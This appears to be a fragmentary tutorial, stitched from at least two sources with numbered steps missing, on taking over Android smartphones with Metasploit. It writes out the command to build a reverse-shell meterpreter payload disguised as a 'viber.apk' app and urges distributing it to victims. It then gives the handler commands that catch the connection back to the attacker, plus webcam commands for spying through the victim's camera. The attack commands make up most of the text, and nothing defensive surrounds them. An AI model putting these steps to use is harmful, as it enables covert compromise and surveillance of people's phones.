Smartphone Process Thru Metaspoint
Smartphone Process Thru Metaspoint
Metasploit
Run Kali Linux and check your IP address
(This will create an apk file in root folder which is our msfpayload script file.)
msfpayload android/meterpreter/reverse_tcp
LHOST=<attacker_ip_address> LPORT=<4444> R > viber.apk
Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker
machine, attacker needs to set up the handler to handle incoming connections to the port already
specified above. Type msfconsole to go to Metasploit console.
(Attacker already have the APK's file and now he will start distribute it, I don't need to describe
how to distribute this file, and internet is the good place for distribution)
When the victim lunches the apk file then attacker will get meterpreter shell connected to victim’s
Android smartphone.
webcam_list
webcam_snap 2
Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom
in kali linux. Metasploit is now a outdated tool.
STEPS :
Note: Don't add any stray space characters anywhere. Use the command as is (after changing the
LHOST and LPORT as needed).
3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.
Command:
root@kali:-# msfconsole
5. Now it's time to open and setup multi-handler. Follows the steps :
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone,
meterpreter session will be established.
https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-
and-metasploit-framework-9e90af4a4d7b